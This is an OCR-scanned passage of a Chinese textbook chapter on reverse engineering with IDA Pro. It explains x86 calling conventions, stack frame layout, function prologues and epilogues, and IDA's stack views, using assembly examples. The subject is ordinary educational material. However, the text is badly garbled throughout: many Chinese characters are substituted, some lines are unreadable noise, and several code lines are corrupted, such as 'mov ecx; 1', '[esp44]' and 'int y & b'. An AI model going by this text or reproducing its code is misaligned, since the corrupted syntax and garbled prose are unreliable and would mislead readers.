为 避免 标准 一 词 引 起 混 消 ， 在 本 书 的 剩余 部 分 ， 我 们 将 这 种 调用 约定 称 为 stdcal11 调 用 
约定 。 
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和 cdec1 调 用 约定 一 样 ，stdcal1 调 用 约定 按 从 右 到 左 的 顺序 将 果 数 参数 放 在 程序 栈 上 。 使 
用 stdcall 调 用 约定 的 区 别 在 于 : 函数 结束 执行 时 ， 应 由 被 调用 的 函数 负责 删除 栈 中 的 函数 参 
数 。 对 被 调用 的 函数 而 言 ， 要 完成 这 个 任务 ， 它 必须 清楚 知道 栈 中 有 多 少 个 参数 ， 这 只 有 在 函 
数 接受 的 参数 数量 固定 不 变 时 才 有 可 能 。 因 此 ，printf 这 种 接受 数量 可 变 的 参数 的 函数 不 能 使 
用 stdcall 调 用 约定 。 例 如 ，demo_stdcall 吨 数 需要 3 个 整数 参数 ， 在 栈 上 共 占 用 12 个 字 市 (在 
32 位 体系 结构 上 为 3*sizeof(int) ) 的 空间 。x86 编 译 器 能 够 使 用 RET 指 令 的 一 种 特殊 形式 ,同时 
从 栈 顶 提取 返回 地 址 ， 并 给 栈 指 针 加 上 12， 以 清除 函数 参数 。demo_stdcal1 可 能 会 使 用 以 下 指 
令 返 回 到 调用 方 : 














ret 12 ; return and clear 12 bytes from the stack 





使 用 stdcall 的 主要 优点 在 于 ， 在 每 次 函数 调用 之 后 ， 不 需要 通过 代码 从 栈 中 清除 参数 ， 
而 能 够 生成 体积 稍 小 、 速 度 稍 快 的 程序 。 根 据 惯例 ,微软 对 所 有 由 共享 库 ( DLL ) 文件 输出 的 参 
数 数量 固定 的 函数 使 用 stdcall 约 定 。 如 果 你 正和 尝试 为 某 个 共享 库 组 件 生成 函数 原型 或 与 二 进 制 
兼容 的 蔡 代 者 ， 请 一 定 记 住 这 一 点 。 

3. x86 fastcal1 约 定 

fastcal1 约 定 是 stdcal1 约 定 的 一 个 变 体 , 它 向 CPU 寄存 器 ( 而 非 程 序 栈 ) 最 多 传递 两 个 参数 。 
Microsoft Visual C/C++ 和 GNU gcc/g++〈3.4 及 更 低 版 本 ) 编译 带 能 人 够 识别 函数 声明 中 的 fastcall 
修饰 符 。 如 果 指 定 使 用 fastcal1 约 定 ， 则 传递 给 吨 数 的 前 两 个 参数 将 分 别 位 于 ECX 和 EDX 寄 存 需 
中 。 剩 余 的 其 他 参数 则 以 类 似 于 stdcal1 约 定 的 方式 从 右 到 左 放 和 人 栈 上 。 同 样 与 stdcal1 约 定 类 似 
的 是 ， 在 返回 其 调用 方 时 ，fastcal1 轴 数 负责 从 栈 中 删除 参数 。 下 面 的 声明 中 即使 用 了 fastcal1 
修饰 符 : 























void fastcall demo fastcall(int w, int x, int y, int z); 


为 调用 demo_fastcal1， 编 译 器 可 能 会 生成 以 下 代码 : 


; demo fastcall(1, 2, 3, 4); //programmer calls demo fastcall 


push 4 ; move parameter z to second position on stack 
push 3 ; move parameter y to top position on stack 
mov edx, 2 ; move parameter x to edx 

mov ecx; 1 ; move parameter w to ecx 

call demo fastcall ; call the function 








注意 ， 调 用 demo_fastcal1 返 回 后 ， 并 不 需要 调整 栈 、 因 为 demo_fastcal1 负 责 在 返回 到 调用 
方 时 从 栈 中 清除 参数 y 和 z。 由 于 有 两 个 参数 被 传递 到 寄存 希 中 , 被 调用 的 六 数 仅仅 需要 从 栈 中 清 
除 8 字 方 ， 即 使 该 孔 数 拥有 4 个 参数 也 是 如 此 ， 理 解 这 一 点 很 重要 。 

4. C++ 调 用 约定 

C++ 类 中 的 非 静 态 成 员 子 数 与 标准 函数 不 同 ， 它 们 需要 使 用 this 指 针 ， 该 指针 指 困 用 于 调用 
国 数 的 对 象 。 用 于 调用 函数 的 对 象 的 地 址 必须 由 调用 方 提供 ， 因 此 , 它 在 调用 非 静 态 成 员 也 数 时 
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作为 参数 提供 。C++ 语 言 标准 并 未 规定 应 如 何 问 非 静态 成 员 函 数 传递 this 指 针 ， 因 此 ， 不 同 编译 
器 使 用 不 同 的 技巧 来 传递 this 指 针 ， 这 点 也 就 不 足 为 奇 了 。 

Microsoft Visual C++ 提供 thiscal1 调 用 约定 ， 它 将 this 传 递 到 ECX 寄 存 右 中 ， 并 且 和 
在 stdcal1 中 一 样 ， 它 要 求 非 静 态 成 员 困 数 清除 栈 中 的 参数 。GNU gti ad Chis No 
任何 非 静 态 成 员 函 数 的 第 一 个 隐 含 人 参数， 而 在 所 有 其 他 方面 与 使 用 cdec1 约 定 相 同 。 因 此 ， 
对 使 用 g++ 编译 的 代码 来 说 ， 在 调用 非 静 态 成 员 孔 数 之 前 ，this 被 放置 到 栈 顶 ， 且 调用 方 负 
责 在 函数 返回 时 删除 栈 中 的 参数 (至少 有 一 个 参数 )。 已 编译 的 C++ 代码 的 其 他 特性 将 在 第 8 
章 中 讨论 。 

5. 其 他 调用 约定 

要 完整 地 介绍 现 有 的 每 一 个 调用 约定 ， 可 能 需要 写 一 本 书 。 调 用 约定 通常 是 特定 于 语言 、 编 
译 器 和 CPU 的 。 如 果 遇 到 由 更 少见 的 编译 吉 生 成 的 代码 ， 可 能 需要 你 自己 进行 一 番 研 究 。 但 是 ， 
以 下 这 些 情况 需要 特别 注意 : 优化 代码 、 定 制 汇 编 语 言 代 码 和 系统 调用 。 

如 果 输 出 孔 数 ( 如 库 函 数 ) 是 为 了 供 其 他 程序 员 使 用 ， 那么 ， 它 必须 遵照 主流 的 调用 约定 ， 
以 便 程 序 员 能 够 轻松 调用 这 些 函 数 。 男 外 如 果 函 数 仅 供 内 部 程序 使 用 , 则 该 旺 数 需要 采用 只 有 郴 
数 的 程序 才 了 解 的 调用 约定 。 在 这 类 情况 下 , 优化 编译 器 会 选择 使 用 备用 的 调用 约定 ， 以 生成 运 
行 速度 更 快 的 代码 ,这样 的 例子 包括 : 在 Microsoft Visual C++ 中 使 用 /GL 选 项 , 以 及 在 GNU gcc/g++ 
中 使 用 regparm 关 键 字 。 

如 果 程 序 员 不 怕 麻 烦 ， 使 用 了 汇编 语言 , 那么 , 他们 就 能 够 完全 控制 如 何 向 他 们 创建 的 函数 
传递 参数 。 除 非 他 们 和 希望 创建 供 其 他 程序 员 使 用 的 孔 数 , 否则， 汇编 语言 程序 员 能 够 以 任何 他 们 
认为 适当 的 方式 传递 参数 。 因 此 , 在 分 析 自 定义 汇编 代码 时 , 请 格外 小 心 。 在 模糊 例 程 (obfuscation 
routine ) 和 shellcode 中 经 稼 可 以 看 到 目 乍 义 汇 编 代 码 。 

系统 调用 是 一 种 特殊 的 消 数 调用 ， 用 于 请 求 一 项 操作 系统 服务 。 通 常 ， 系统 调 用 会 造成 状态 
转换 ， 由 用 户 模式 进入 内 核 模式 ， 以 便 操 作 系统 内 核 执行 用 户 的 请 求 。 启 动 系统 调用 的 方式 因 操 
作 系 统 和 CPU 而 异 。 例 如 ，Linux x86 系 统 调用 使 用 int 0x80 指 令 或 sysenter 指 令 启 动 ， 而 其 他 x86 
操作 系统 可 能 只 使 用 sysenter 指 令 。 在 许多 x86 系 统 ( Linux 是 一 个 例外 ) 上 上， 系统 调用 的 参数 位 
于 运行 时 栈 上 ， 并 在 启动 系统 调用 之 前 ， 在 EAX 寄存 器 中 放 入 一 个 系统 调用 编号 。Linux 系 统 调 
用 接受 位 于 特定 寄存 器 中 的 参数 ， 有 时 候 ， 如 果 可 用 寄存 需 无 法 存储 所 有 的 参数 ， 它 也 接受 位 于 
内 存 中 的 参数 。 


6.2.2 ”局 部 变量 布局 


存在 规定 如 何 向 函数 传递 参数 的 调用 约定 , 但 不 存在 规定 函数 的 局 部 变量 布局 的 约定 。 编译 
器 的 第 一 个 任务 是 ,计算 出 函数 的 局 部 变量 所 需 的 空间 。 编 译 需 的 第 二 个 任务 ， 则 是 确定 这 些 变 
量 是 否 可 在 CPU 寄存 器 中 分 配 ， 或 者 它们 是 否 必 须 在 程序 栈 上 分 配 。 至 于 具体 的 分 配方 式 ， 既 与 
函数 的 调用 方 无 关 ， 也 与 被 调用 的 函数 无 关 。 值 得 注意 的 是 ,通过 检查 也 数 的 源 代码 ,通常 无 法 
确定 函数 的 局 部 变量 布局 。 
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6.2.3 $in 
以 下 面 这 个 在 32 位 x86 计 算 机 上 编译 的 函数 为 例 : 





void bar(int j, int k);  // a function to call 
void demo stackframe(int a, int b, int c) { 

int x; 

char buffer[64]; 


// body of function not terribly relevant other than 
bar(z, y); 
; 
PHRIS, PAESE 3767 AREE Are 5 EORUM LAT 647 5 ZEIREX ) XUT ER 
数 可 能 使 用 stdcal1 或 cdec1 调 用 约定 ,它们 的 栈 帧 完全 相同 。 如 图 6-3 所 示 是 一 个 用 于 调用 
demo_stackframe 的 栈 帧 实现 ， 假 设 它 并 没有 使 用 帆 指 针 寄 存 硕 〈 因 此 栈 指针 ESP 作 为 由 指针 )。 
进入 demo_stackframe 时 ， 可 以 使 用 下 面 的 一 行 “ 序 言 ” 配 置 这 个 栈 帧 : 

















sub esp, 76 ; allocate sufficient space for all local variables 
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局 部 变 


[esp*72] 


e 


参数 


图 6-3 ”基于 ESP 的 栈 帧 
生成 利用 栈 指针 计算 所 有 变量 引用 的 旺 数 需要 编译 器 做 更 多 工作 ， 因 为 栈 指针 会 频繁 变化 ， 
编译 闫 必须 确保 它 在 引用 栈 帧 中 的 任何 变量 时 始终 使 用 了 正确 的 人 往 移 量 。 以 对 demo_stack- frame 
函数 中 bar 的 调用 代码 为 例 : 











@ push  dword [esp+4] ; push y 
@ push  dword [esp44] ; push z 
call bar 
add esp, 8 ; cdecl requires caller to clear parameters 


6.2 Gin 71 





根据 图 6-3 中 的 偏 移 量 ，@ 人 处 的 push 准 确 地 将 局 部 变量 y 压 入 栈 中 。 初 看 起 来 , 似乎 @ 处 
的 push 错 误 地 再 次 引用 了 局 部 变量 y。 但 是 ， 因 为 我 们 处 理 的 是 一 个 基于 ESP 的 帧 ， 且 @ 处 
的 push 修 改 ESP， 所 以 每 次 ESP 发 生 改变 ,图 6-3 中 的 所 有 偏 移 量 都 会 临时 进行 调整 。 于 是 ， 
在 @ 之 后 ，@ 处 的 push 中 正确 引用 的 局 部 变量 z 的 新 偏 移 量 变 为 [esp+4] 。 在 分 析 使 用 栈 指 
针 引 用 栈 帧 变量 的 函数 时 ， 你 必须 小 心 ， 注 意 栈 指针 的 任何 变化 ， 并 对 所 有 未 来 的 变量 偏 
移 量 进 行 相应 调整 。 使 用 栈 指针 引用 所 有 栈 帧 变量 的 好 处 在 于 : 所 有 其 他 寄存 融 仍 可 用 于 
其 他 目的 。 

demo stackframe 完 成 后 ， 它 需要 返回 调用 方 。 最 终 ， 需 要 使 用 ret 指 令 从 栈 顶 弹出 所 需 返回 
地 址 ， 并 将 其 插入 指令 指针 寄存 器 (此 时 为 EIP ) 中 。 在 弹出 返回 地 址 之 前 ， 需 要 从 栈 顶 删除 局 
部 变量 ， 以 便 在 ret 指 令 执 行 时 ， 栈 指针 正确 地 指向 所 保存 的 返回 地 址 。 这 个 特殊 函数 的 “尾声 ” 
如 下 所 示 : 




















add esp, 76 ; adjust esp to point to the saved return address 
ret ; return to the caller 


由 于 专门 使 用 一 个 寄存 需 作 为 帧 指针 ， 并 通过 一 段 代码 在 基数 入 口 点 配置 了 帧 指针 ， 因 此 ， 
计算 局 部 变量 偏 移 量 的 工作 变 得 更 加 轻松 。 在 x86 程 序 中 ，EBP (extended base pointer， 扩 展 基 址 
旨 针 ) 寄存 融通 稼 专门 用 作 栈 帧 指针 。 默 认 情 次 下 ， 多 数 编译 需 会 生成 代码 以 使 用 帧 指针 ， 而 无 
视 规 定 应 使 用 栈 指针 的 选项 。 例 如 ，GNU gcc/g++ 提 供 了 -fomit-frame-pointer 编 译 器 选项 ， 可 
生成 不 依赖 于 固定 帧 指针 寄存 着 的 羡 数 。 

为 了 解 使 用 专用 帧 指针 的 demo_stackframe 栈 帧 的 结构 , 我 们 以 下 面 这 段 “序言 ”代码 为 例 : 











© push ebp ; save the caller's ebp value 
O mov ebp, esp  ; make ebp point to the saved register value 
@ sub esp, 76 ; allocate space for local variables 


e Ah B pushtH SIRTF 2A n gl ci np Ip. IRH T Intel 320 DER 28 D SS SEV y JH 
程序 二 进 制 接口 (System V Application Binary Interface ) "HSJ PRŽI LAMEPEEAX, ECXAIEDX 
寄存 硕 , 但 需要 为 所 有 其 他 寄存 融 保 留 调用 方 的 值 。 因 此 ,如 条 希望 将 EBP 作为 帧 指针 ,那么 ， 
在 修改 它 之 前 ， 必 须 保存 EBP 的 当前 值 ， 并 且 在 返回 调用 方 时 恢复 EBP 的 值 。 如 果 需 要 为 调用 
方 保 存 其 他 寄存 器 〈 如 ESI 或 EDI )， 编 译 器 可 能 会 在 保存 EBP 的 同时 保存 这 些 寄 存 器 ， 或 者 推 
迟 保存 操作 ， 下 到 局 部 变量 已 经 得 到 分 配 。 因 此 ， 栈 帧 中 并 没有 用 于 存储 被 保存 寄存 硕 的 标准 
位 置 。 

EBP 被 保存 后 ， 就 可 以 对 其 进行 修改 ， 使 它 指 癌 当前 的 栈 位 置 。 这 由 @ 处 的 mov 指 令 来 完成 ， 
它 将 栈 指针 的 当前 值 复制 到 EBP 中 。 最 后 ， 和 在 非 基 于 EBP 的 栈 帧 中 一 样 ， 局 部 变量 的 空间 在 @ 
处 分 配 。 得 到 的 栈 帆 布局 如 网 6-4 所 未 。 























(D Z&Whttp://www.sco.com/developers/devspecs/abi386-4.pdf., 
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[ebp-72] 


ebp 一 -| saved ebp | Leni ` 
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图 6-4 基于 EBP 的 栈 帧 





使 用 一 个 专用 的 帧 指针 , 所 有 变量 相对 于 帧 指针 寄存 硕 的 俩 移 量 和 都 可 以 计算 出 来 。 许 多 时 候 
(尽管 并 无 要 求 ), 正 偏 移 量 用 于 访问 函数 参数 ， 而 负 偏 移 量 则 用 于 访问 局 部 变量 。 使 用 专用 的 帧 
旨 针 ， 我 们 可 以 目 由 更 改 栈 指 针 ， 而 不 至 影响 帧 内 其 他 变量 的 侦 移 量 。 现 在 ， 对 上 闻 数 bar 的 调用 
可 以 按 以 下 方式 执行 : 











@ push dword [ebp-72] ; push y 
push  dword [ebp-76] ; push z 
call bar 
add esp, 8 ; cdecl requires caller to clear parameters 





在 执行 @ 处 的 push 指 令 后 ， 栈 指针 已 经 发 生 改 变 ， 但 这 不 会 影响 到 随后 的 push 指 令 对 局 部 变 
量 z 的 访问 。 

最 后 ， 国 数 完成 其 操作 后 ， 使 用 帧 指针 需要 一 段 稍 有 不 同 的 “尾声 ”代码 ， 因 为 在 返回 前 ， 
必须 恢复 调用 方 的 帧 指针 。 在 检索 帧 指针 的 初始 值 之 前 ， 必 须 从 栈 中 清除 局 部 变量 。 不 过 ， 由 于 
当前 的 帧 指针 指 回 最 初 的 帧 指针 ， 这 个 任务 可 轻松 完成 。 在 使 用 EBP 作为 帧 指针 的 x86 程 序 中 ， 
下 面 的 代码 是 一 段 上 典型 的 “尾声 ”代码 . 


mov esp, ebp ; clears local variables by reseting esp 
pop ebp ; restore the caller's value of ebp 
ret ; pop return address to return to the caller 


由 于 这 项 操作 十 分 常见 ， 因 此 ，x86 体 系 结构 提供 了 1eave 指 令 ， 以 轻松 完成 这 个 任务 。 


leave ; Copies ebp to esp AND then pops into ebp 
ret ; pop return address to return to the caller 


其 他 处 理 带 体系 结构 使 用 的 寄存 从 和 指令 肯定 会 有 所 不 同 , 但 构建 栈 帧 的 基本 过 程 并 无 明显 
差异 。 无 论 是 何 种 体系 结构 ， 你 都 需要 熟悉 典型 的 “序言 ”和 和 “尾声” 代码， 以便 迅速 开始 分 析 
胃 数 中 你 更 感 兴趣 的 代码 。 
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6.2.4 ”1IDA 栈 视图 


很 明显 ， 栈 帧 是 一 个 运行 时 概念 ， 没 有 栈 和 运行 中 的 程序 ， 栈 帧 就 不 可 能 存在 。 话 虽 如 此 ， 
但 这 并 不 意味 着 你 在 使 用 IDA 之 类 的 工具 进行 静态 分 析 时 ， 就 可 以 忽略 栈 帧 的 概念 。 二 进 制 文 件 
中 包含 配置 每 个 函数 的 栈 巾 所 需 的 全 部 代码 。 通过 和 仔细 分 析 这 段 代 人 码 , 我 们 可 以 深入 了 解 任何 吨 
数 的 栈 帧 的 结构 ， 即 使 这 个 函数 并 未 运行 。 实 际 上 ，IDA 中 的 一 些 最 复杂 的 分 析 ， 就 是 为 了 专门 
确定 IDA 反 汇编 的 每 个 函数 的 栈 帧 的 布局 ,在 初始 分 析 过 程 中 ,IDA 会 记 住 每 一 项 push 或 pop 操 作 ， 
以 及 其 他 任何 可 能 改变 栈 指 针 的 算术 运算 ,如 增加 或 减 去 常量 , 尽 其 所 能 去 监控 栈 指 针 在 函数 执 
行 过程 中 的 行为 。 这 项 分 析 的 第 一 个 目标 是 确定 分 配给 函数 栈 帧 的 局 部 变量 区 域 的 具体 大 小 。 其 
他 目标 包括 : 确定 某 隆 数 是 否 使 用 一 个 专用 的 帧 指针 ( 例如， 通过 识别 push ebp/mov ebp, esp 
序列 )， 以 及 识别 对 函数 栈 帆 内 变量 的 所 有 内 存 引 用 。 例 如 ， 如 果 IDA 在 demo_stackframe 的 正文 
中 发 现 以 下 指令 : 























mov eax, [ebp+8] 


CDI. PÉXKEBUSS— rä 〈 此 时 为 a ) SEIIZESIEAXSE aH (IE-4), HHM 
析 栈 帧 的 结构 ，IDA 能 够 区 分 访问 函数 参数 (位 于 被 保存 的 返回 地 址 之 下 ) 的 内 存 引用 及 访问 局 
部 变量 ( 位 于 被 保存 的 返回 地 址 之 上 ) 的 引用 。IDA 还 会 采取 额外 的 步骤， 确定 栈 帧 内 的 哪些 内 
存 位 置 被 直接 引用 。 人 例如， 虽然 图 6-4 中 栈 帧 的 大 小 为 96 字 和 ， 但 我 们 只 会 看 到 7 个 变量 ( 4 个 局 
部 变量 和 3 个 参数 ) 被 引用 。 

了 解 函 数 的 行为 通常 归结 为 了 解 该 限 数 操纵 的 数据 的 类 型 。 在 阅读 反 汇 编 代 码 清 单 时 ,查看 
哨 数 的 栈 帆 细 目 ,是 你 了 解 函 数 所 操纵 的 数据 的 第 一 个 机 会 。IDA 为 任何 浮 数 栈 巾 都 提供 了 两 种 
视图 : 摘要 视图 和 详细 视图 。 为 了 解 这 两 种 视图 ， 我 们 以 下 面 使 用 gece 编译 的 demo —tacktframepg 
数 为 例 : 











void demo stackframe(int a, int b, int c) { 
llb X c! 
char buffer[64]; 
int y & b; 
int z = 10; 
buffer[0|] = 'A'; 
bar(z, y); 
Í 


在 这 个 例子 中 ， 我 们 分 别 为 变量 x 和 y 提 供 了 初始 值 c 和 b。 为 变量 z 提 供 了 初始 值 党 量 10。 夯 
外 ，64 字 万 局 部 数组 buffer 的 第 一 个 字符 被 初始 化 为 字母 'A'  。 这 个 图 数 对 应 的 IDA 反 汇编 代码 
如 下 : 





.text:00401090 
.text:00401090 ; Attributes: @bp-based frame 
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.text :00401090 
.text:00401090 demo stackframe proc near ; CODE XREF: sub 4010C1+41Vp 
. text : 00401090 

O  .text:00401090 var 60 
.text:00401090 var 5C 
.text:00401090 var 58 
. text :00401090 var C 
.text:00401090 arg 4 


dword ptr -60h 
dword ptr -5Ch 
byte ptr -58h 
dword ptr -oCh 
dword ptr oCh 


.text:00401090 arg 8 = dword ptr 10h 

. text :00401090 

. text :00401090 push ebp 

. text :00401091 mov ebp, esp 

. text :00401093 sub esp, 78h 

. text :00401096 mov eax, [ebp+@arg 8] 
.text:00401099 Qmov [ebp+var C], eax 
. text :0040109C emov eax, [ebp+arg Al 
. text :0040109F emov [ebp+var 5C], eax 
. text :004010A2 Omov [ebp+var 60|，0OAh 
. text :004010A9 Omov [ebp+var 58], 41h 
. text :004010AD mov eax, [ebp+var 5C] 
. text :004010B0 mov [esp+4], eax 
.text:004010B4 mov eax, [ebp+var 60] 
.text:004010B7 @mov [esp], eax 

. text :004010BA call bar 

. text :004010BF leave 

. text :004010CO0 retn 


.text:004010CO demo stackframe endp 


下 面 我 们 介绍 以 上 代码 中 的 许多 内 容 ， 以 逐步 熟悉 IDA 的 反 汇 编 代 码 。 首 先 从 开始 ， 基 于 
对 函数 “序言 ”代码 的 分 析 ，IDA 认 为 这 个 因 数 使 用 EBP 寄存 需 作 为 栈 指针 。 从 位 置 @@ 得 知 ，gcc 
在 栈 帧 中 分 配 了 120 字 节 〈78h 等 于 120 ) 的 局 部 变量 空间 ， 这 包括 用 于 问 @ 处 的 bar 传 递 两 个 参数 
的 8 字 节 ; 但 是 ， 它 仍然 远大 于 我 们 前 面 估算 的 76 字 节 ， 这 表示 编译 器 有 时 会 用 额外 的 字 节 填补 
局 部 变量 空间 ， 以 确保 栈 帧 内 的 特殊 对 齐 方式 。 从 @ 开 始 ，IDA 提 供 了 一 个 摘要 栈 视图 ， 列 出 了 
栈 帧 内 被 直接 引用 的 每 一 个 变量 ,以 及 变量 的 大 小 和 它们 与 帧 指针 的 偏 移 忠 离 。 

IDA 会 根据 变量 相对 于 被 保存 的 返回 地 址 的 位 置 , 为 变量 取 名 。 局 部 变量 位 于 被 保存 的 返 
回 地 址 之 上 ， 而 函数 参数 则 位 于 被 保存 的 返回 地 址 之 下 。 局 部 变量 名 称 以 var 为 前 级 ， 后 面 
跟 一 个 表示 变量 与 被 保存 的 帧 指针 之 间距 离 〈 以 字 节 为 单位 ) 的 十 六 进 制 后 级 。 在 本 例 中 ， 
局 部 变量 var (是 一 个 4 字 节 (dword ) 变量 ， 它 位 于 所 保存 的 帧 指针 之 上 ， 上 距离 为 12 字 节 
( [ebp-oCh] )。 函 数 参 数 名 则 以 arg 为 前 缀 ， 后 面 跟 一 个 表示 其 与 最 顶端 的 参数 之 间 的 相对 距 
离 的 十 六 进 制 后 级 。 因 此 ,最 顶端 的 4 字 节 参数 名 为 arg 0， 而 随后 的 参数 则 分 别 为 arg 4. arg 8、 
arg C， 以 此 类 推 。 在 这 个 特例 中 ，arg_0 并 未 列 出 ， 因 为 函数 没有 使 用 参数 4。 由 于 IDA 无 法 
确定 任何 对 [ebp+8] (第 一 个 参数 的 位 置 ) 的 内 存 引 用 ， 所 以 arg_0 并 未 在 摘要 栈 视 图 中 列 出 。 
迅速 浏览 一 下 摘要 栈 视图 即 可 发 现 ， 许 多 栈 位 置 都 没有 命名 ， 因 为 在 程序 代码 中 找 不 到 对 这 
些 位 置 的 直接 引用 。 
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WB IDAUUUOOODOOUOOOOOOOOOOOOOOOO0ODODO 


IDA 反 汇编 代码 清单 与 我 们 前 面 执行 的 栈 帧 分 析 之 间 的 一 个 重要 区 别 在 于 , 在 反 汇 编 代 码 清 
单 中 无 法 找到 类 似 于 [ebp-12] 的 内 存 引用 。 相 反 , IDA 已 经 用 与 栈 视图 中 的 符号 对 应 的 符号 名 称 ， 
以 及 它们 与 栈 帧 指针 的 相对 人 往 移 量 替 代 了 所 有 和 负 量 偶 移 量 。 这 样 做 是 为 了 确保 IDA 生 成 更 高 级 的 
反 汇 编 代 码 。 与 处 理 数字 稼 量 相 比 ， 处 理 符 号 名 称 更 容易 一 些 。 实 际 上 ， 为 方便 我 们 记忆 栈 变量 
的 名 称 ，IDA 人 允许 任意 修改 任何 栈 变 量 的 名 称 ， 稍 后 介绍 这 一 点 。 摘 要 栈 视 图 则 是 从 IDA 生 成 的 
名 称 到 它们 对 应 的 栈 帧 偏 移 量 之 间 的 一 个 “地 图 ”。 例 如 ， 在 反 汇 编 代码 清单 中 出 现 内 存 引 用 
[ebp*arg 8] 的 地 方 ， 可 以 使 用 [ebp+10h] 或 [ebp+16] 代 蔡 。 如 果 你 更 希望 看 到 数字 偏 移 量 ，IDA 
会 乐于 为 你 显示 。 右 击 @ 处 的 arg 8， 将 会 出 现 如 图 6-5 所 示 的 上 下 文 菜 单 ， 它 提供 了 几 个 可 用 于 
更 改 显 示 格 式 的 选项 。 

















eax, [ebptarg 8] 
[ebprvar C], ea iy Xrefs from 
ear, [ebptarg 4 
[Sbprvar 5C], e 
[ebprvar 60], 0 Ze [ebp+10h] 
[ebptvar 58], 
eax, [ebptvar 5 Del [ebp+19] 
[esp4s4], eax [ebp -20a] 
eax, [ebptvar 6 Pz] [ebp--10000b] 
[esp], eax 
Foo ' Iz Manual... 
f Edit function... 
= Hide 
Graph wiew 
x Undefine 
SUBROUTINE =s Synchronize with d: 


F1 Use standard symbolic constant | 





图 6-5 选择 一 种 蔡 代 的 显示 格式 


在 这 个 特例 中 ， 由 于 可 以 对 照 源 代 但 ， 我 们 可 以 利用 反 汇 编 窗口 中 的 一 系列 线索 ， 将 IDA 生 
成 的 变量 名 称 与 源 代码 中 使 用 的 名 称 对 应 起 来 。 

(1) #2, demo stackframe 使 用 了 3 个 参数 : a、b 和 c。 它 们 分 别 与 变量 arg 0、arg 4 和 arg 8 
对 应 ( 尽管 arg_0 因 没有 被 引用 而 被 反 汇编 代码 清单 忽略 TL 

(2) 局 部 变量 x 由 参数 c 初 始 化 。 因 此 ，var (与 x 对 应 ， 因 为 x 由 @ 处 的 arg 8 初始 化 。 

(3) 同样 ， 局 部 变量 y 由 参数 b 初 始 化 。 因 此 ，var 5C 与 y 对 应 ， 因 为 y 由 @@ 处 的 arg 4 初始 化 。 

(4) 局 部 变量 z 与 var_60 对 应 ， 因 为 它 由 @ 处 的 值 10 初 始 化 。 

(5) 64 字 节 的 字符 数组 buffer 从 var_58 处 开始 ， 因 为 buffer[0] 由 处 的 A (ASCI 0x41 ) 初 
始 化 。 

(6) 调用 bar 的 两 个 变量 被 转移 到 @ 处 的 栈 中 ， 而 非 压 入 栈 。 这 是 当前 版 本 (3.4 及 更 高 版 本 ) 
的 gcc 的 典型 做 法 。IDA 认 可 这 一 约定 并 选择 不 为 栈 帧 顶部 的 两 项 创建 局 部 变量 引用 。 

除 摘要 栈 视图 外 ，IDA 还 提供 一 个 详细 栈 帧 视 网 ， 这 种 视 网 会 显示 一 个 栈 帧 所 分 配 到 的 每 一 
个 字 节 。 双 击 任何 与 某 一 给 定 的 栈 帧 有 关 的 变量 名 称 ， 即 可 进入 详细 视图 。 在 前 一 个 列表 中 ,， 双 


























76 POF 反 汇 编导 航 


击 var_C 将 打开 如 图 6-6 所 示 的 栈 帧 视图 ( 按 ESC 键 关闭 该 窗口 )。 






-0000000C var C dd ? 

-00000008 db 7 ; undefined 
-00000007 db 7 ; undefined 
-000000 0é db 7 ; undefined 
-00000005 db 7 ; undefined 
-00000004 db 7 ; undefined 
-00000003 db 7 ; undefined 
-00000002 db 7 ; undefined 
-00000001 db 7 ; undefined 
+00000000 s db 4 dup(?) 

+00000004 r db 4 dup(?) 

+00000008 db 7 ; undefined 
+00000009 db 7 ; undefined 
+0000000A db 7 ; undefined 
+0000000B db 7 ; undefined 
-000000D0C arg A dd ? 

-00000010 arg 8 dd ? 

[sp++00000004 ,站 
k 





图 6-6 ”IDA 栈 帧 视图 
由 于 详细 视图 显示 栈 帧 中 的 每 一 个 字 节 ， 它 占用 的 空间 会 比 摘要 视图 〈 仅 列 出 被 引用 的 变量 ) 
多 许多 。 岁 6-6 中 显示 的 栈 帧 部 分 一 共 蜂 越 32? 字 他 ， 但 它 仅 占 整个 栈 帧 的 一 小 部 分 。 注 意 ， 函 数 仅 为 
直接 引用 的 字 节 分 配 了 名 称 。 例 如 ， 与 arg 0 对 应 的 参数 a， 在 demo _ stackframe 中 从 未 被 引用 。 由 于 没 








有 内 存 引用 可 供 分 析 , IDA 选 择 不 处 理 栈 中 的 对 应 字 节 , 它们 的 偏 移 量 由 +00000008 至 +0000000B。 另 一 
方面 ， 在 反 汇 编 代码 清单 中 ，arg 4 在 @ 处 被 直接 引用 ， 且 其 内 容 被 加 载 到 32 位 EAX 寄存 融 中 。 基 于 
有 32 位 数据 被 转移 这 一 事实 ，IDA 得 出 推断 ，arg 4 是 一 个 4 字 节 变量 ， 并 将 其 标记 如 此 (db 定义 一 个 
存储 字 节 ，dw 和 定义 两 个 存储 字 节 ， 也 叫做 字 ; dd 定义 4 个 存储 字 节 ， 也 叫做 双 字 )。 

图 6-6 中 显示 的 两 个 特殊 值 分 别 为 S 和 r (前 面 均 带 有 空格 )。 这 些 伪 变 量 是 IDA 表 示 被 保存 的 
返回 地 址 Cre) 和 被 保存 的 寄存 需 值 (sS， 在 本 例 中 ，s 仅 代表 EBP ) 的 特殊 方法 。 由 于 需要 显示 
栈 帧 中 的 每 一 个 字 节 ， 为 体现 完整 性 ， 这 些 值 也 包含 在 栈 帧 视图 中 。 

栈 帧 视图 有 利于 我 们 深入 分 析 编 译 器 的 内 部 工作 机 制 。 在 图 6-6 中 ， 很 明显 ， 编 译 器 在 保存 
的 帧 指针 s 与 局 部 变量 x( var 6 ) 之 间 额 外 插入 了 8 字 节 ,在 栈 帧 中 ,这些 字 节 的 偏 移 量 为 -00000001 
至 -00000008。 为 外 ， 对 与 摘要 视图 中 列 出 的 每 一 个 变量 有 关 的 偏 移 量 进行 几 次 算术 运算 ， 即 可 
发 现 : 编译 器 给 位 于 var 58 的 字符 缓冲 区 分 配 了 76 字 节 ( 而 非 源 代码 中 的 64 字 节 )。 如 果 你 是 一 
名 编译 器 开发 者 ， 或 者 愿意 深入 分 析 gcc 的 源 代 码 ， 否 则 ， 你 只 能 推测 编译 器 如 此 分 配 这 些 额 外 
字 节 的 原因 。 多 数 情况 下 ， 你 可 以 将 分 配 这 些 额 外 字 节 的 原因 归结 成 为 对 齐 所 做 的 填补 ， 而 且 这 
些 字 节 通常 不 会 影响 程序 的 行为 。 毕 竟 ， 如 果 程 序 员 要 求 64 字 节 ,， 却 得 到 76 字 节 ， 程 序 应 该 不 会 
表现 出 不 同 的 行为 , 特别 是 程序 员 使 用 的 字 节 没有 超出 所 请 求 的 64 字 节 的 情况 下 。 男 一 方面 ， 如 
